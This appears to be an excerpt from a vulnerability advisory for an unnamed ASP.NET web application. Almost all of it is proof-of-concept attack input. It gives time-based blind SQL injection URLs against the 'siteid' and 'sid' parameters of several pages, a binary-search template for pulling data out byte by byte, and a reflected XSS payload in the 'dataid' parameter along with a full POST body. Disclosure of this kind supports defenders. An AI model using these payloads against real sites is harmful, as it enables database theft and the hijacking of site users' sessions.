# Original Advisory: http://www.bugreport.ir/index_77.htm

1. Exploits/POCs:
    1.1. Injection Flaws. Blind SQL Injection in "/about.aspx" and "/archive.aspx" and "/default1.aspx" in "siteid" parameter.
    1.2. Injection Flaws. Blind SQL Injection in "/archive.aspx" in "sid" parameter.
        -------------
        Check database username:
        http://[URL]/default1.aspx?siteid=1'; IF SYSTEM_USER='sa' waitfor delay '00:00:10'--
        http://[URL]/archive.aspx?sid=19&siteid=1'; IF SYSTEM_USER='sa' waitfor delay '00:00:10'--
        http://[URL]/archive.aspx?sid=19'; IF SYSTEM_USER='sa' waitfor delay '00:00:10'--&siteid=1
        
        Binary Search Exploits:
        http://[URL]/about.aspx?siteid=1'; IF ASCII(SUBSTRING((…),i,1)) > k waitfor delay '00:00:10'--
        
        Note: In last POC, i is the i-th byte returned by the one-row subquery (…) and k is the current middle value of the binary search.
        
        -------------
    1.3. Cross Site Scripting (XSS). Reflected XSS attack in "/showdata.aspx" in "dataid" parameter. (POST METHOD)
        -------------
        http://[URL]/showdata.aspx?dataid=%22%20onmouseover%3Dprompt%28%27XSS-from-BugReport%27%29%20continue%3D%22&siteid=1
        
        __EVENTARGUMENT=&__EVENTTARGET=&__EVENTVALIDATION=%2fwEWBQKh%2f8jADgKprNPRAQKe%2b%2bCDCwKY38eYCQLRmu35DOB6MkYbirW%2fduDB97KKNKznAXjO&__VIEWSTATE=%2fwEPDwUKMTc1Nzk5Nzk1MGQYAgU0Y3RsMDAkQ29udGVudFBsYWNlSG9sZGVyMSRWaWV3cG9pbnQxJENhcHRjaGFDb250cm9sMQ8FJDc4OTg0YzkzLThiOWQtNDczZi04OTExLWYwZjcxODRiODFiOWQFMWN0bDAwJENvbnRlbnRQbGFjZUhvbGRlcjEkVmlld3BvaW50MSRHVl9WaWV3UG9pbnQPPCsACgEIZmTsHHUhMC543Vq3m%2fWANPP5J1edvw%3d%3d&ctl00%24ContentPlaceHolder1%24Viewpoint1%24CaptchaControl1=&ctl00%24ContentPlaceHolder1%24Viewpoint1%24sendvp=%d8%a7%d8%b1%d8%b3%d8%a7%d9%84&ctl00%24ContentPlaceHolder1%24Viewpoint1%24tx_body=&ctl00%24ContentPlaceHolder1%24Viewpoint1%24tx_email=sample@email.tst&ctl00%24ContentPlaceHolder1%24Viewpoint1%24tx_name=testt
        -------------